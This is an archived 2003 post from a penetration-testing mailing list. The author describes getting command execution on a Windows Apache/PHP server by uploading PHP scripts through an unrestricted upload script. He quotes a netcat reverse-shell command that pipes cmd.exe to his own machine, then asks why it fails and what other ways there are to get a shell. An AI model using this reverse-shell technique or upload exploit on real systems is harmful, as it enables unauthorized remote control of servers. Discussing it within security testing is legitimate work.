Penetration Testing mailing list archives

php and netcat?


From: "Maarten" <secfocus () hartsuijker com>
Date: Tue, 18 Feb 2003 20:24:05 +0100

Hi,

I am testing a Windows-based Apache server that's got PHP and MySQL
installed on it. I found a PHP script that allows uploading other PHP
scripts. The upload directory is also readable and executable. So I have
uploaded some of my own scripts and can execute any command I want using
`cmd /c command.exe`

I am looking for ways to further exploit this server. The file system is
probably "everyone full control". Have not tested that yet. What I tried to
do was use netcat to send a command shell to my own machine (cmd /c nc
333.333.333.333 333 -e cmd.exe). I can see with tcpdump that the webserver
contacts my own machine on port 333, however, I do not get a command prompt
like I am getting when running the same netcat command from the command
prompt of a Windows machine. Anyone know why?

If anyone knows an alternative to get a shell on the server, I would also
appreciate it. Of course I can run any command through php, but there should
be alternatives..... An alternative to my netcat idea is also
appreciated }-)

maarten


